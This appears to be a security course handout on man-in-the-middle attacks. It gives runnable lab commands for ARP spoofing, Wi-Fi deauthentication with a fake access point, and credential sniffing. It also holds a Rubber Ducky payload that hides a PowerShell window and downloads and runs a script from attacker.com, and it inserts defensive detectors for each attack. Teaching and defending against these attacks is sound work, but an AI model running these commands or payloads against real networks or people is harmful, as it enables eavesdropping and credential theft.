Spying: Introduction, Man-In-The-Middle Attack, Bad USB with MIMA, ARP Poisoning with MIMA, and Fake Access Point Theory with MIMA.
Introduction to Spying in Cybersecurity
Spying in cybersecurity refers to the act of intercepting, monitoring, or stealing information from
a target system, network, or user without their consent. It is commonly associated with cyber
espionage, surveillance, and malicious attacks. Spying techniques are widely used by attackers
to exploit vulnerabilities in networks, applications, and hardware devices.
Objectives of Spying:
1. Data Theft: Stealing sensitive information such as passwords, financial details, and
private communications.
2. Surveillance: Monitoring user activities, keystrokes, or network traffic.
3. Exploiting Network Weaknesses: Finding and exploiting weaknesses in network
security.
4. Manipulation and Disruption: Altering communication data or injecting malicious
payloads.
Man-In-The-Middle Attack (MIMA)
A Man-In-The-Middle Attack (MIMA) is a cyberattack where an attacker secretly intercepts and
potentially alters the communication between two parties without their knowledge.
Steps in MIMA:
1. Interception: The attacker gains access to the communication channel.
2. Decryption (if applicable): If encryption is used, the attacker attempts to decrypt the
messages.
3. Modification: The attacker alters the data before passing it on.
4. Relay: The manipulated data is sent to the intended recipient, making it appear as a
legitimate exchange.
Types of Man-In-The-Middle Attacks
1. Session Hijacking – Stealing session tokens to impersonate a user.
2. SSL Stripping – Downgrading HTTPS to HTTP for easy interception.
3. Wi-Fi Eavesdropping – Intercepting communications on unsecured Wi-Fi networks.
4. DNS Spoofing – Redirecting users to malicious websites by altering DNS responses.
5. ARP Poisoning – Manipulating ARP tables to reroute network traffic.
Lab Exercise: Man-In-The-Middle Attack Using ARP Spoofing
Objective:
To demonstrate how an attacker can intercept network traffic between two devices using ARP
poisoning.
Tools Required:
● Kali Linux
● ettercap (or arpspoof)
● Wireshark (for packet analysis)
● Two devices (one victim, one attacker)
Lab Setup:
1. Connect all devices to the same network.
2. Ensure Kali Linux has the necessary tools installed:
sudo apt update && sudo apt install ettercap-text-only wireshark
3. Enable IP forwarding to allow packet forwarding:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
Step 1: Start ARP Spoofing Attack
Using ettercap, initiate the attack:
sudo ettercap -Tq -M arp:remote /192.168.1.10// /192.168.1.1//
● Replace 192.168.1.10 with the victim’s IP.
● Replace 192.168.1.1 with the gateway’s IP.
Alternatively, using arpspoof:
sudo arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
Step 2: Capture Network Traffic
● Open Wireshark and start capturing packets on eth0.
● Apply filters like http, ftp, or telnet to look for unencrypted data.
Step 3: Analyze the Data
● Identify credentials or sensitive data intercepted.
● Observe HTTP requests and responses.
Step 4: Stop the Attack and Clean Up
● Stop ARP spoofing:
sudo pkill ettercap
sudo pkill arpspoof
● Disable IP forwarding:
echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
Mitigation Strategies
● Use HTTPS and SSL/TLS for secure communication.
● Enable ARP spoofing detection tools like arpwatch.
● Implement static ARP entries where feasible.
● Use VPNs to encrypt traffic.
● Employ multi-factor authentication (MFA).
Bad USB with MIMA
Bad USB refers to a maliciously modified USB device that exploits the trust computers place in
USB peripherals. When combined with MIMA techniques, it can be a powerful spying tool.
How Bad USB Works in MIMA:
1. Device Impersonation: The USB disguises itself as a keyboard, network adapter, or
storage device.
2. Payload Execution: Upon connection, the USB executes a script to intercept or
manipulate network traffic.
3. Man-In-The-Middle Attack: The attacker captures and modifies communication
between the victim and a legitimate service.
4. Data Exfiltration: Sensitive data such as credentials or keystrokes are stolen and sent to an external server.
Lab Exercise: Bad USB Attack Using Rubber Ducky
Objective:
To demonstrate how a Bad USB device can be used to launch a Man-In-The-Middle Attack.
Tools Required:
● Hak5 Rubber Ducky (or Digispark USB)
● Kali Linux
● Pre-configured payload script
Step 1: Prepare the Malicious USB
1. Create a Rubber Ducky script (payload.txt):
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/mima.ps1')"
ENTER
2. Encode the script into inject.bin using DuckEncoder:
java -jar duckencoder.jar -i payload.txt -o inject.bin
3. Load inject.bin onto the Rubber Ducky USB.
Step 2: Deploy the Attack
1. Plug the Bad USB into the victim’s system.
2. The script executes a PowerShell command that downloads and runs a remote MIMA
script.
3. The attacker intercepts network traffic and can manipulate data in transit.
Step 3: Analyze and Clean Up
● Use Wireshark to capture traffic and confirm the attack.
● Remove malicious scripts and reset the victim’s network settings.
Prevention Measures:
● Disable USB autorun and limit USB device usage.
● Use endpoint security solutions.
● Implement network segmentation to prevent unauthorized access.
● Monitor for suspicious USB activity.
● Restrict USB device access and enforce security policies.
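To make "Monitor for suspicious USB activity" concrete, here is an added example (not from the handout, and not the logic of any named endpoint product) of the keystroke-timing heuristic used against keystroke-injection devices: a Rubber Ducky STRING line arrives at a steady few milliseconds per key, far faster than a human can type. The timestamps are constructed; a real deployment would read them from the input-event layer.

```python
import statistics

def make_sample():
    """Constructed keystroke timestamps in ms (not a real input log): 15 keys of
    human typing at ~200 ms per key, then a 60-key injected STRING at 12 ms per key."""
    events, t = [], 0.0
    for _ in range(15):
        t += 200.0
        events.append(t)
    for _ in range(60):
        t += 12.0
        events.append(t)
    return events

def find_injection_bursts(times_ms, min_keys=20, max_gap_ms=30.0):
    """Return (start_ms, end_ms, n_keys, mean_gap_ms) for every run of at least
    min_keys consecutive keystrokes in which each key follows the previous one
    within max_gap_ms. Humans rarely sustain sub-30 ms gaps for 20 keys; a
    scripted payload does so for its whole STRING line."""
    bursts, run_start = [], 0
    for i in range(1, len(times_ms) + 1):
        # A gap above the cap, or the end of the log, closes the current run.
        gap_ok = i < len(times_ms) and times_ms[i] - times_ms[i - 1] <= max_gap_ms
        if not gap_ok:
            n = i - run_start
            if n >= min_keys:
                gaps = [times_ms[j] - times_ms[j - 1] for j in range(run_start + 1, i)]
                bursts.append((times_ms[run_start], times_ms[i - 1], n, statistics.mean(gaps)))
            run_start = i
    return bursts

if __name__ == "__main__":
    for start, end, n, mean_gap in find_injection_bursts(make_sample()):
        print(f"possible keystroke injection: {n} keys from {start:.0f} to {end:.0f} ms, "
              f"mean gap {mean_gap:.1f} ms")
```

A hit is a reason to block the new HID device (e.g. with a USB allow-listing policy) and inspect what was typed, not proof of compromise on its own.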
ARP Poisoning with MIMA
Address Resolution Protocol (ARP) Poisoning is a network attack that exploits the ARP
protocol to associate the attacker's MAC address with the IP address of another device,
redirecting traffic through the attacker.
ARP Poisoning Attack Steps:
1. Spoofing ARP Messages: The attacker sends fake ARP messages to the network.
2. Misleading Devices: Victim devices associate the attacker's MAC address with the
legitimate device’s IP.
3. Interception & Modification: The attacker intercepts and modifies data passing through
the network.
4. Denial of Service (Optional): The attacker can drop or alter packets to disrupt network
communication.
Lab Setup:
1. Connect all devices to the same network.
2. Ensure Kali Linux has the necessary tools installed:
sudo apt update && sudo apt install ettercap-text-only wireshark
3. Enable IP forwarding to allow packet forwarding:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
Step 1: Start ARP Poisoning Attack
Using ettercap, initiate the attack:
sudo ettercap -Tq -M arp:remote /192.168.1.10// /192.168.1.1//
● Replace 192.168.1.10 with the victim’s IP.
● Replace 192.168.1.1 with the gateway’s IP.
Alternatively, using arpspoof:
sudo arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
● This command tells the victim’s machine that the attacker is the gateway.
● To poison the gateway as well, run:
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.10
Step 2: Capture Network Traffic
● Open Wireshark and start capturing packets on eth0.
● Apply filters like http, ftp, or telnet to look for unencrypted data.
Step 3: Inject Malicious Data
● Use dsniff to capture credentials:
sudo dsniff -i eth0
● Modify data using Bettercap:
sudo bettercap -iface eth0
net.probe on
set arp.spoof.targets 192.168.1.10
arp.spoof on
Step 4: Stop the Attack and Clean Up
● Stop ARP spoofing:
sudo pkill ettercap
sudo pkill arpspoof
● Disable IP forwarding:
echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
Detection & Prevention:
● Use static ARP tables where possible.
● Enable ARP inspection on network switches.
● Use security tools like arpwatch and Wireshark.
● Implement network segmentation.
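A defender-side check matching the arpwatch recommendation (in the first lab's mitigation list and in this Detection & Prevention list), added here as an example that is not part of the handout or of arpwatch itself: it replays constructed ARP reply records through the three checks an ARP monitor needs, against the lab's own scenario (gateway 192.168.1.1, victim 192.168.1.10; the attacker MAC 00:11:22:33:44:55 is made up). On a live host the same records would come from a packet capture.

```python
from collections import defaultdict

# Constructed ARP replies as (timestamp_s, sender_ip, sender_mac); not a real capture.
# 192.168.1.1 is the gateway and 192.168.1.10 the victim, as in the lab above;
# 00:11:22:33:44:55 is a hypothetical attacker NIC.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.1.1", "aa:bb:cc:00:00:01"),   # real gateway
    (0.5, "192.168.1.10", "aa:bb:cc:00:00:10"),  # real victim
    (1.0, "192.168.1.1", "00:11:22:33:44:55"),   # attacker claims the gateway IP
    (1.1, "192.168.1.10", "00:11:22:33:44:55"),  # attacker claims the victim IP too
    (1.2, "192.168.1.1", "00:11:22:33:44:55"),   # periodic re-poisoning
    (1.3, "192.168.1.1", "00:11:22:33:44:55"),
]

def detect_arp_poisoning(replies, gateway_ip, flood_window=2.0, flood_threshold=3):
    """Return (kind, key, detail) alerts in the order they fire, each once.

    kind is one of:
      "flip-flop": an IP's MAC differs from the MAC previously seen for it
      "multi-ip" : one MAC answers for more than one IP (both ends poisoned)
      "flood"    : >= flood_threshold replies for the gateway within flood_window s
    """
    ip_to_mac, mac_to_ips = {}, defaultdict(set)
    gateway_times, alerts, seen = [], [], set()

    def report(kind, key, detail):
        if (kind, key) not in seen:          # alert once per (kind, key)
            seen.add((kind, key))
            alerts.append((kind, key, detail))

    for ts, ip, mac in replies:
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            report("flip-flop", ip, f"{prev} -> {mac} at t={ts}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:
            report("multi-ip", mac, f"claims {sorted(mac_to_ips[mac])} at t={ts}")
        if ip == gateway_ip:
            gateway_times = [t for t in gateway_times if ts - t <= flood_window] + [ts]
            if len(gateway_times) >= flood_threshold:
                report("flood", ip, f"{len(gateway_times)} replies in {flood_window}s at t={ts}")
    return alerts

if __name__ == "__main__":
    for kind, key, detail in detect_arp_poisoning(SAMPLE_ARP_REPLIES, "192.168.1.1"):
        print(f"[{kind}] {key}: {detail}")
```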
Fake Access Point Theory with MIMA
Introduction to Fake Access Points
A Fake Access Point (Fake AP) is a rogue Wi-Fi network set up by an attacker to trick users
into connecting, allowing them to intercept and manipulate network traffic. This is commonly
used in Man-In-The-Middle Attacks (MIMA) to steal credentials, inject malware, or spy on
users' activities.
How Fake Access Points Work in MIMA:
1. Impersonating Legitimate Networks: The attacker sets up a Wi-Fi network with the
same name (SSID) as a trusted network.
2. Forcing Users to Connect: Using Deauthentication Attacks, attackers disconnect
users from the real Wi-Fi, forcing them to reconnect to the fake one.
3. Traffic Interception: All user data passes through the attacker's system, allowing
credential theft, packet injection, and phishing attacks.
4. Credential Harvesting: Attackers can redirect users to fake login pages to steal
passwords.
Lab Exercise: Creating a Fake Access Point with MIMA
Objective:
To demonstrate how an attacker can set up a fake Wi-Fi network and perform a
Man-In-The-Middle Attack.
Tools Required:
● Kali Linux
● aircrack-ng (for deauthentication attack)
● hostapd (for creating the fake AP)
● dnsmasq (for DHCP and DNS spoofing)
● Wireshark (for packet analysis)
Step 1: Set Up the Fake Access Point
1. Install the required tools:
sudo apt install hostapd dnsmasq aircrack-ng
2. Configure hostapd to create a fake Wi-Fi network:
sudo nano /etc/hostapd/hostapd.conf
Add the following:
interface=wlan0
ssid=Free_WiFi
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
3. Start the fake access point:
sudo hostapd /etc/hostapd/hostapd.conf
Step 2: Force Users to Connect
Use aircrack-ng to disconnect users from real Wi-Fi networks:
sudo aireplay-ng -0 10 -a <BSSID> wlan0
● Replace <BSSID> with the real access point’s MAC address.
Step 3: Perform the Man-In-The-Middle Attack
1. Enable IP forwarding:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
2. Use bettercap to intercept and modify traffic:
sudo bettercap -iface wlan0
net.probe on
set wifi.ssid Free_WiFi
wifi.ap on
3. Capture credentials using dsniff:
sudo dsniff -i wlan0
Step 4: Clean Up
● Stop hostapd and dnsmasq:
sudo pkill hostapd
sudo pkill dnsmasq
● Disable IP forwarding:
echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
Prevention Measures:
● Avoid connecting to open Wi-Fi networks.
● Use VPNs to encrypt traffic.
● Enable HTTPS and SSL/TLS for secure communication.
● Use Wi-Fi security mechanisms such as WPA3 and enterprise authentication.
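Two checks a wireless monitor can run against the tactics described in this section (SSID cloning and deauthentication), added here as an example that is not part of the handout: an allow-list of trusted BSSIDs per SSID flags an unknown radio advertising Free_WiFi (an open network where the real one is WPA2 marks a downgrade twin), and a burst counter flags the deauth flood. The beacon and deauth records, the BSSIDs and the allow-list are all constructed.

```python
from collections import defaultdict

# Constructed beacon observations (bssid, ssid, channel, security); not a real scan.
# The legitimate "Free_WiFi" AP is WPA2 on channel 1; the second entry reuses the SSID
# from an unknown BSSID, open, on channel 6 (the hostapd settings from the lab above).
TRUSTED_APS = {"Free_WiFi": {"aa:bb:cc:dd:ee:01"}}
SAMPLE_BEACONS = [
    ("aa:bb:cc:dd:ee:01", "Free_WiFi", 1, "WPA2"),
    ("00:11:22:33:44:55", "Free_WiFi", 6, "OPEN"),
    ("aa:bb:cc:dd:ee:02", "Guest", 11, "WPA2"),
]
# Constructed deauth frames (timestamp_s, bssid, dest); ten broadcast deauths in 1 s.
SAMPLE_DEAUTHS = [(10.0 + 0.1 * i, "aa:bb:cc:dd:ee:01", "ff:ff:ff:ff:ff:ff")
                  for i in range(10)]

def find_evil_twins(beacons, trusted):
    """Return (bssid, ssid, channel, security, downgrade) for each BSSID that
    advertises a trusted SSID without being on its allow-list. downgrade is True
    when the twin is open but no trusted AP for that SSID is."""
    trusted_security = defaultdict(set)
    for bssid, ssid, _, sec in beacons:
        if bssid in trusted.get(ssid, set()):
            trusted_security[ssid].add(sec)
    alerts = []
    for bssid, ssid, chan, sec in beacons:
        if ssid in trusted and bssid not in trusted[ssid]:
            downgrade = sec == "OPEN" and "OPEN" not in trusted_security[ssid]
            alerts.append((bssid, ssid, chan, sec, downgrade))
    return alerts

def deauth_burst(frames, bssid, window_s=2.0, threshold=5):
    """True if at least threshold deauth frames from bssid fall inside any
    window_s span; normal roaming produces isolated deauths, a flood does not."""
    times = sorted(t for t, b, _ in frames if b == bssid)
    for i in range(len(times)):
        j = i
        while j < len(times) and times[j] - times[i] <= window_s:
            j += 1
        if j - i >= threshold:
            return True
    return False

if __name__ == "__main__":
    for bssid, ssid, chan, sec, downgrade in find_evil_twins(SAMPLE_BEACONS, TRUSTED_APS):
        print(f"untrusted AP {bssid} advertising {ssid} on ch{chan} ({sec})"
              + (", security downgrade" if downgrade else ""))
    print("deauth flood against real AP:", deauth_burst(SAMPLE_DEAUTHS, "aa:bb:cc:dd:ee:01"))
```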